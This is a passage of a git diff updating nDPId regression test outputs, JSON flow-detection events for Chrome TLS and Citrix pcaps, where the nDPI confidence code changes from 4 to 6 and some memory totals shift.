-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","packets-captured":5633,"packets-processed":5633,"total-skipped-flows":0,"total-l4-payload-len":4613247,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1620902515049} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5633/5633 @@ -51,9 +51,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6050682 bytes -~~ total memory freed........: 6050682 bytes -~~ total allocations/frees...: 123785/123785 +~~ total memory allocated....: 6184316 bytes +~~ total memory freed........: 6184316 bytes +~~ total allocations/frees...: 126547/126547 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 943 chars diff --git a/test/results/citrix.pcap.out b/test/results/citrix.pcap.out index e19e2ade4..094fb0753 100644 --- a/test/results/citrix.pcap.out +++ b/test/results/citrix.pcap.out @@ -3,8 +3,8 @@ 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":0,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":0,"pkt":"4F+5aekiABUXp3WjCABFAAAsrYMAAIAGYjoVAAAIFgAAB7CpBdYP1me4AAAAAGACgAC\/CQAAAgQFtAAA6CmQmA=="} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":2,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":2,"pkt":"ABUXp3Wj4F+5aekiCABFAAAsrVIAAH4GZGsWAAAHFQAACAXWsKkP1nFlD9ZnuWASgAA9vQAAAgQFtAAA3WOanQ=="} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":2,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":2,"pkt":"4F+5aekiABUXp3WjCABFAAAorYQAAIAGYj0VAAAIFgAAB7CpBdYP1me5D9ZxZlAQgABVegAAAAAAAAAAIuNIFQ=="} -00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":2,"flow_last_seen":8,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":8,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":2,"flow_last_seen":1605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":855,"flow_tot_l4_payload_len":5490,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1605,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":2,"flow_last_seen":8,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":8,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":2,"flow_last_seen":1605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":855,"flow_tot_l4_payload_len":5490,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1605,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-payload-len":5490,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1605} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 